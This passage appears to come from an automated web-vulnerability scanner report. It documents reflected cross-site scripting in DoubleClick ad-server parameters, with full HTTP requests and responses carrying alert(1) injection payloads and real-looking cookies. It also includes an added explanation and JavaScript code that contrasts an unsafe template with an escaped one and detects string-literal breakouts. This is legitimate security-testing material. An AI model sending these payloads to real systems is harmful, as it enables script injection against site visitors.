document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
var FWH = ' width="300" height="125" ';
var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN62d24"-alert(1)-"6480d73bfc4&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%3D%3fhttp:
...[SNIP]...

6.31. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e918"-alert(1)-"98486586506 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=109283854e918"-alert(1)-"98486586506&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:10 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
gif";
var minV = 9;
var FWH = ' width="300" height="125" ';
var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=109283854e918"-alert(1)-"98486586506&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1
...[SNIP]...

6.32. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload efee8'-alert(1)-'f5fd40e0f0a was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385efee8'-alert(1)-'f5fd40e0f0a&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:15 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385efee8'-alert(1)-'f5fd40e0f0a&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1
...[SNIP]...

6.33. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59df8'-alert(1)-'0d6f83edabc was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G59df8'-alert(1)-'0d6f83edabc&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:05 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G59df8'-alert(1)-'0d6f83edabc&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B4
...[SNIP]...

6.34. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cfc7"-alert(1)-"93944cc2a03 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G4cfc7"-alert(1)-"93944cc2a03&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:00 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
300x125_14Mar2011.gif";
var minV = 9;
var FWH = ' width="300" height="125" ';
var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G4cfc7"-alert(1)-"93944cc2a03&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B4
...[SNIP]...

6.35. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [destination parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3dc69"-alert(1)-"b1724e75ee9 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=3dc69"-alert(1)-"b1724e75ee9 HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6343
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 02 May 2011 12:53:50 GMT
Expires: Mon, 02 May 2011 12:53:50 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=3dc69"-alert(1)-"b1724e75ee9http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%3D%3fhttp://www.bmw.com.au/com/en/newvehicles/x/x3/2010/showr
...[SNIP]...

6.36. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [destination parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e382b'-alert(1)-'c8d54a88246 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=e382b'-alert(1)-'c8d54a88246 HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6343
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 02 May 2011 12:53:55 GMT
Expires: Mon, 02 May 2011 12:53:55 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=e382b'-alert(1)-'c8d54a88246http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%3D%3fhttp://www.bmw.com.au/com/en/newvehicles/x/x3/2010/showr
...[SNIP]...

6.37. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1af9'-alert(1)-'24059d22b80 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!d1af9'-alert(1)-'24059d22b80&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:52:04 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!d1af9'-alert(1)-'24059d22b80&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B5776418
...[SNIP]...

6.38. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9f0d"-alert(1)-"8875c28e870 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!c9f0d"-alert(1)-"8875c28e870&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:51:59 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
et/376153/3-BMW_X3_300x125_14Mar2011.gif";
var minV = 9;
var FWH = ' width="300" height="125" ';
var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!c9f0d"-alert(1)-"8875c28e870&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B5776418
...[SNIP]...
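All of the ad.au.doubleclick.net findings above (6.28 to 6.38) are one defect seen through different parameters: the click-through URL built from the request is concatenated raw into the JavaScript the server returns, once inside var url = escape("...") and once inside a document.write('<a href=\"...\">') call. Because /adj/ serves application/x-javascript that publisher pages load with a script tag, the injected code runs in the embedding page's origin (the news site in the Referer), not in the ad server's. Burp's canary "-alert(1)-" (or the single-quote twin) is chosen because "...AUBEEN62d24"-alert(1)-"6480d73bfc4..." is still valid JavaScript: the literal is closed, alert(1) is subtracted from it, and a new literal absorbs the rest, so the response parses and executes either way. The block below is an added example, not DoubleClick's code or anything from this report: it reconstructs a stand-in for the vulnerable template (wrapper.example and the exact template text are assumptions; the parameter names and canaries come from the report), puts a hardened version beside it, and implements the check a tester wants, namely whether a reflected canary ends up inside one string literal or crosses its boundary.

```javascript
// Added example, not code from the report or from DoubleClick. The template
// and host are guesses; parameter names and canaries are taken from the report.
const BASE = 'http://wrapper.example/GRedirect.aspx'; // hypothetical redirector

function buildQuery(params, encode) {
  return Object.entries(params)
    .map(([k, v]) => (encode
      ? `${encodeURIComponent(k)}=${encodeURIComponent(v)}`
      : `${k}=${v}`))
    .join('&');
}

// Vulnerable stand-in: values are concatenated raw into two JavaScript string
// literals, one double-quoted, one single-quoted (compare the report's
// 'var url = escape("...")' and document.write('<a ... href=\"...\">') lines).
// A '"' in a value breaks the first literal, a "'" breaks the second.
function renderUnsafe(params) {
  const url = `${BASE}?${buildQuery(params, false)}`;
  return `var url = escape("${url}");\n` +
         `document.write('<a target=\\"_blank\\" href=\\"${url}\\">');\n`;
}

// Hardened stand-in. Each value is URL-encoded (no '&', '=', '"' or '<' can
// reach the query string), the URL is HTML-encoded where it lands in an
// attribute, and every JavaScript string is emitted through JSON.stringify,
// which escapes '"' and '\' for the delimiter actually used. '</' is escaped
// as well so the output stays safe if it is ever inlined in an HTML page.
const htmlAttr = (s) => s.replace(/[&<>"']/g, (c) => `&#${c.charCodeAt(0)};`);
const jsString = (s) => JSON.stringify(s).replace(/<\//g, '<\\/');

function renderSafe(params) {
  const url = `${BASE}?${buildQuery(params, true)}`;
  return `var url = escape(${jsString(url)});\n` +
         `document.write(${jsString(`<a target="_blank" href="${htmlAttr(url)}">`)});\n`;
}

// Labels every character of a JavaScript source with the index of the string
// literal it sits in (-1 outside any literal). The quotes themselves count as
// outside. Backslash escapes are honoured; comments, regex literals and
// template substitutions are not modelled, which is enough for the generated
// code above.
function literalIds(source) {
  const ids = new Array(source.length).fill(-1);
  let quote = null;
  let id = -1;
  for (let i = 0; i < source.length; i++) {
    const ch = source[i];
    if (quote === null) {
      if (ch === '"' || ch === "'" || ch === '`') { quote = ch; id++; }
      continue;
    }
    if (ch === quote) { quote = null; continue; }
    ids[i] = id;
    if (ch === '\\' && i + 1 < source.length) ids[++i] = id; // escaped char
  }
  return ids;
}

// Offsets of every occurrence of `needle` that is not wholly inside a single
// string literal, i.e. the places where reflected input has become code.
// An empty array means every reflection is inert text.
function breakouts(source, needle) {
  const ids = literalIds(source);
  const hits = [];
  for (let at = source.indexOf(needle); at >= 0; at = source.indexOf(needle, at + 1)) {
    const first = ids[at];
    let inside = first !== -1;
    for (let i = at; inside && i < at + needle.length; i++) inside = ids[i] === first;
    if (!inside) hits.push(at);
  }
  return hits;
}

// Parameters from finding 6.30, with Burp's double-quote canary in PG.
const REPORTED = {
  PID: '8197329', UIT: 'G', TargetID: '10928385', AN: '2017002340',
  PG: 'AUBEEN62d24"-alert(1)-"6480d73bfc4',
  ASID: '97866bc3bc534483a55e34973920acb3', destination: '',
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe breakouts:', breakouts(renderUnsafe(REPORTED), 'alert(1)'));
  console.log('safe breakouts:  ', breakouts(renderSafe(REPORTED), 'alert(1)'));
}
```

Run against the 6.30 parameters, the unsafe rendering reports one breakout (the escape("...") line; in the document.write line the same '"' is harmless because that literal is single-quoted), while the single-quote canary from 6.28 does the reverse. The hardened rendering still contains the text alert(1), but every occurrence sits inside a literal, which is the distinction the scanner's "echoed unmodified" wording glosses over: reflection is only a finding when the reflected bytes change the parse. Note that the escape() call in the original is no defence, since it runs after the literal has already been assembled on the server.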

6.39. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [campID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.390

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e39a"-alert(1)-"8d72fc9941b was submitted in the campID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.390;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bf1f9c18805cba7f4%3B12fb0be2376,0%3B%3B%3B2888316814,smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAdiO-sC8BAAAAAAAAADE1OTYwZmYyLTc0YmEtMTFlMC1hYWUzLTAwMjM3ZDQzN2VmNQA4nyoAAAA=,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=803404e39a"-alert(1)-"8d72fc9941b&crID=110847&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=;ord=1304340341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABcOWgN9IsHCvhK0lkUX7yuRwW0ceklLOf6oZ84AAAAAA==,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D2052082148%26u%3Dhttp%253A%252F%252Fwww.theage.com.au%252Fnational%252Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,15960ff2-74ba-11e0-aae3-00237d437ef5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:49:54 GMT
Content-Length: 9062

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
